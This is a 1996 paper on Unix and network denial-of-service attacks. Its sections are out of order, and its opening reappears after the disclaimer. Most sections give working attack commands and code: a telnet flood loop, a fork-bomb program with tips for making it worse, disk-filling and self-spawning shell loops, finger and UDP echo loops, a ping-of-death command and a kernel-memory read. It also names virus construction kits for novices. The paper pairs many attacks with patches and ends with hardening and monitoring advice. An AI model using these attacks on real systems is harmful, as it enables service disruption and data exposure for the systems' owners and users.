.5. Also could a system being booted sometimes be subverted,
especially rap-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
packets to it and almost totally control the boot.
.A.2.4. REVENGE
A denial of service attack could be a part of a revenge against a user
or an administrator.
.A.2.5. POLITICAL REASONS
Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.
For example imagination the Bank A loaning company B money to build a
factory treating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.
.A.2.6. ECONOMICAL REASONS
Imaginative the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.
As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.
.A.2.7. NASTINESS
I know a person that found a workstation where the user had forgotten to
log out. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the log in time and placed a call to
the program from the profile file. That is nastiness.
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE ?
This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.
A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.
Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.
In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.
That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:
- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.
- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.
The two last points gives that Unix is more secure against inside
denial of service attacks.
A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.
.B. SOME BASIC TARGETS FOR AN ATTACK
.B.1. SWAP SPACE
Most systems have several hundred Mb of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.
.B.2. BANDWIDTH
If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.
.B.3. KERNEL TABLES
It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.
Kernel memory allocation is also a target that is sensitive.
The kernel have a kernel-map limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.
For Solaris 2.X it is measured and reported with the start command
how much kernel memory the system is using, but for Sun-OS 4.X there
is no such command. Meaning that under Sun-OS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. net stat -k can also be used and shows how much
memory the kernel have allocated in the sub-paging.
.B.4. RAM
A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...
.B.5. DISKS
A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.
.B.6. CACHES
A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.
These caches are found on Solaris 2.X:
Directory name look-up cache: Associates the name of a file with a v code.
I node cache: Cache information read from disk in case it is needed
again.
R code cache: Holds information about the IFS file system.
Buffer cache: Cache in code indirect blocks and cylinders to disk
I/O.
.B.7. INETD
Well once inetd crashed all other services running through inetd no
longer will work.
.C. ATTACKING FROM THE OUTSIDE
.C.1. TAKING ADVANTAGE OF FINGER
Most fingered installations support re-directions to an other host.
Ex:
$finger @system.two.com
@system.one.com
finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:
$ finger @host.we.attack
All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).
The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.
.C.2. UDP AND SUN-OS 4.1.3.
Sun-OS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.
The solution is to install the proper patch.
.C.3. FREEZING UP X-WINDOWS
If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple X Open Display () to the port.
The same thing can happen to Motif or Open Windows.
The solution is to deny connections to the X-Windows port.
.C.4. MALICIOUS USE OF UDP SERVICES
It is simple to get UDP services (echo, time, daytime, charged) to
loop, due to trivial IP spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loop-back) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.
Ex:
from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7
Note that the name system.we.attack looks like a DNS name, but the
target should always be represented by the IP-number.
Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"
" A great deal of systems don't put loop-back on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "
.C.5. ATTACKING WITH LYNX CLIENTS
A World Wide Web server will fork an http process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses pc. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the net-stat
command could be used to detect the attack (thanks to Paul D. Robertson).
Some http:s (for example HTTP-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)
.C.6. MALICIOUS USE OF telnet
Study this little script:
Ex:
while : ; do
telnet system.we.attack &
done
An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and http:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.
This is a simple high risk vulnerability that should be checked
and if present fixed.
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:
Ex:
Control-}
quit
then will inetd keep going "forever". Well a couple of hundred...
The solution is to install the proper patch.
.C.8. HOW TO DISABLE ACCOUNTS
Some systems disable an account after N number of bad log in , or waits
N seconds. You can use this feature to lock out specific users from
the system.
.C.9. LINUX AND TCP TIME, DAYTIME
Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).
The solution is to install the proper patch.
.C.10. HOW TO DISABLE SERVICES
Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some Sun-OS systems that have the
default set to 48...
The solutions is to set the number to something reasonable.
.C.11. PARAGON OS BETA R1.4
If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.
The solution is to install the proper patch.
.C.12. NOVELLS NET-WARE FTP
Novells Net-ware FTP server is known to get short of memory if multiple
ftp sessions connects to it.
.C.13. ICMP REDIRECT ATTACKS
Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for our-self, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.
Ex: (false messages to send)
DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG
The effect of such messages is a reset of the connection.
The solution could be to turn ICMP redirects off, not much proper use
of the service.
.C.14. BROADCAST STORMS
This is a very popular method in networks there all of the hosts are
acting as gateways.
There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.
Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.
.C.15. EMAIL BOMBING AND SPAMMING
In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.
There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".
.C.16. TIME AND KERBEROS
If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.
.C.17. THE DOT DOT BUG
Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.
The solution is to install the proper patch.
.C.18. SUN-OS KERNEL PANIC
Some Sun-OS systems (running ITS ?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.
The solution could be to install Sun patch 100804.
.C.19. HOSTILE APPLETS
A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:
1) Problems due to bugs.
2) Problems due to features in the language.
In group one we have for example the java byte code verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java byte code verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I am wrong!!!).
Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JD 1.0.1.
Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:
http://www.math.gatech.edu/~mladue/HostileArticle.html
If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.
.C.20. VIRUS
Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.
It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:
* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).
PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.
An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.
.C.21. ANONYMOUS FTP ABUSE
If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.
Also can a host get temporarily unusable by massive numbers of
FTP requests.
For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.
.C.22. SYN FLOODING
Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.
As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.
The syn flooding attack is very hot and it is easy to find more information
about it, for example:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".
[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine
.C.23. PING FLOODING
I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.
Under Unix we could try something like: ping -s host
to send 64 bytes packets.
If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:
ping -l 65510 address.to.the.machine
And the machine will freeze or reboot.
Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).
.C.25. MALICIOUS USE OF SUB-NET MASK REPLY MESSAGE
The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.
The host should not accept the message any time but under the reboot.
.C.26. FLEXlm
Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm down command.
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#
.C.27. BOOTING WITH TRIVIAL FTP
To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.
.D. ATTACKING FROM THE INSIDE
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
Solaris 2.3 will get a kernel panic if this
is executed:
EX:
$ndd /dev/udp udp_status
The solution is to install the proper patch.
.D.2. CRASHING THE X-SERVER
If sticky bit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.
Ex:
$ rm /tmp/.x11-unix/x0
.D.3. FILLING UP THE HARD DISK
If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.
Ex:
while : ;
mkdir .xxx
cd .xxx
done
.D.4. MALICIOUS USE OF eval
Some older systems will crash if eval '\!\!' is executed in the
C-shell.
Ex:
% eval '\!\!'
.D.5. MALICIOUS USE OF fork()
If someone executes this C++ program the result will result in a crash
on most systems.
Ex:
#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>
main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}
You can use any command you want, but uptime is nice
because it shows the workload.
To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.
If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload.
There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.
.D.6. CREATING FILES THAT IS HARD TO REMOVE
Well all files can be removed, but here is some ideas:
Ex.I.
$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$
Ex.II.
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$
(You see the size do count!)
Other well know methods is files with odd characters or spaces
in the name.
These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./<filename>. It should work for
the first example if you have a shell.
.D.7. DIRECTORY NAME LOOK UP CACHE
Directory name look up cache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.
Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.
If the impact is not big enough you should create more files or launch
more processes.
.D.8. CSH ATTACK
Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.
Ex:
|I /bin/csh
nodename : **************b
.D.9. CREATING FILES IN /tmp
Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.
.D.10. USING RESOLV_HOST_CONF
Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.
Ex:
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf
.D.11. SUN 4.X AND BACKGROUND JOBS
Thanks to Mr David Honig <honig@amada.net> for the following:
" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root log in as the kernel process table fills."
" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."
.D.12. CRASHING DG/UX WITH ULIMIT
ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.
.D.13. NET-TUNE AND HP-UX
/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:
- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.14. SOLARIS 2.X AND NFS
If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.
$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUN-OS 4.1.X
Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.
.E. DUMPING CORE
.E.1. SHORT COMMENT
The core dumps things don't really belongs in this paper but I have
put them here anyway.
.E.2. MALICIOUS USE OF NETSCAPE
Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.
Ex:
<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>
.E.3. CORE DUMPED UNDER WUFTPD
A core dumped could be created under wuftp with two different
methods:
(1) Then pasv is given (user not logged in (ftp -n)). Almost all
versions of BSD:s ftpd.
(2) More than 100 arguments is given with any executable
command. Presents in all versions of BSD:sd ftpd.
.E.4. ld UNDER SOLARIS/X86
Under Solaris 2.4/X86 ld dumps core if given with the -s option.
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
You can not make your system totally secured against denial of service
attacks but for attacks from the outside you can do a lot. I put this
work list together and hope that it can be of some use.
.F.1.2. SECURITY PATCHES
Always install the proper security patches. As for patch numbers
I don't want to put them out, but that doesn't matter because you
anyway want to check that you have all security patches installed,
so get a list and check! Also note that patches change over time and
that a solution suggested in security bulletins (i.e. CERT) often
is somewhat temporary.
.F.1.3. PORT SCANNING
Check which services you have. Don't check with the manual
or some configuration file, instead scan the ports with strobe
or some other port scanner. Actual you should do this regularly to see
that anyone don't have installed a service that you don't want on
the system (could for example be service used for a pirate site).
Disable every service that you don't need, could for example be rexd,
fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,
tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime
and charged is possible to get to loop. There is however no need
to turn discard off. The discard service will just read a packet
and discard it, so if you turn off it you will get more sensitive to
denial of service and not the opposite.
Actual can services be found on many systems that can be used for
denial of service and brute force hacking without any logging. For
example Stock rexec never logs anything. Most popd:s also don't log
anything
.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
Check that attacks described in this paper and look at the
solution. Some attacks you should perform yourself to see if they
apply to your system, for example:
- Freezing up X-Windows.
- Malicious use of telnet.
- How to disable services.
- Sun-OS kernel panic.
- Attacking with lynx clients.
- Crashing systems with ping from Windows 95 machines.
That is stress test your system with several services and look at
the effect.
Note that Solaris 2.4 and later have a limit on the number of ICMP
error messages (1 per 500 ms I think) that can cause problems then
you test your system for some of the holes described in this paper.
But you can easy solve this problem by executing this line:
$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0
.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
Check the inside attacks, although it is always possibly to crash
the system from the inside you don't want it to be to easy. Also
have several of the attacks applications besides denial of service,
for example:
- Crashing the X-Server: If stickybit is not set in /tmp
a number of attacks to gain
access can be performed.
- Using resolv_host_conf: Could be used to expose
confidential data like
/etc/shadow.
- Core dumped under wuftpd: Could be used to extract
password-strings.
If I don't have put out a solution I might have recommended son other paper.
If not I don't know of a paper with a solution I feel that I can recommend.
You should in these causes check with your company.
.F.1.6. EXTRA SECURITY SYSTEMS
Also think about if you should install some extra security systems.
The basic that you always should install is a log daemon and a wrapper.
A firewall could also be very good, but expensive. Free tools that can
be found on the Internet is for example:
TYPE:
NAME:
URL:
LOG DAEMON NET LOG ftp://net.tamu.edu/pub/security/TAMU
WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit
Note that you should be very careful if building your own firewall with
TIS or you might open up new and very bad security holes, but it is a very
good security packer if you have some basic knowledge.
It is also very good to replace services that you need, for example telnet,
rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be
found at URL:
ftp://ftp.cs.hut.fi/pub/ssh
The addresses I have put out are the central sites for distributing
and I don't think that you should use any other except for CERT.
For a long list on free general security tools I recommend:
"FAQ: Computer Security Frequently Asked Questions".
.F.1.7. MONITORING SECURITY
Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:
- up time
- show mount
- ps
- net stat
- finger
(see the man text for more information).
.F.1.8. KEEPING UP TO DATE
It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:
- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.
- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.
.F.1.9. READ SOMETHING BIGGER AND BETTER
Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.
(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:
INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600
We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.
(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.
(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.
(4) CERT have aklso published several good papers, for example:
- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.
I think however that the last paper have overlooked several things.
(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".
(6) Also see section ".G. SUGGESTED READING"
You should also get some big good commercial book, but I don't want
to recommend any.
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.
.F.2.2. COMMANDS AND SERVICES
For more information read the man text.
netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.
Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.
.F.2.3. PROGRAMS
Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/
Top: Top might be a more simple program than Proctool, but is
good enough.
.F.2.4. ACCOUNTING
To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.
You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:
- netstat
- iostat -D
- vmstat
.G. SUGGESTED READING
.F.1. INFORMATION FOR DEEPER KNOWLEDGE
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.
Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html
.F.2. KEEPING UP TO DATE INFORMATION
(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.
.F.3. BASIC INFORMATION
(1) Husman, H. INTRODUCTION TILL DATA SKETCHER UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUCTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Prevention,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.
.H. COPYRIGHT
This paper is Copyright (c) 1996 by Hans Husman.
Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.
.I. DISCLAIMER
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
![]() |
| DENIAL OF SERVICE |
A.1. WHAT IS A DENIAL OF SERVICE ATTACK ?
Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.
A.2. WHY WOULD SOMEONE CRASH A SYSTEM ?
A.2.1. INTRODUCTION
Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:
.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.
I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.
A.2.2. SUB-CULTURAL STATUS
After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP spoof attack, it was "only" a denial of service
attack. Why?
I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their career with denial of service attacks.
.A.2.3. TO GAIN ACCESS
Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:
.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.
.2. Syn flooding could be a part of a IP-spoof attack method.
.3. Some program systems could have holes under the start up,
that could be used to gain root, for example SSH (secure shell).
.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.
.5. Also could a system being booted sometimes be subverted,
especially rap-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
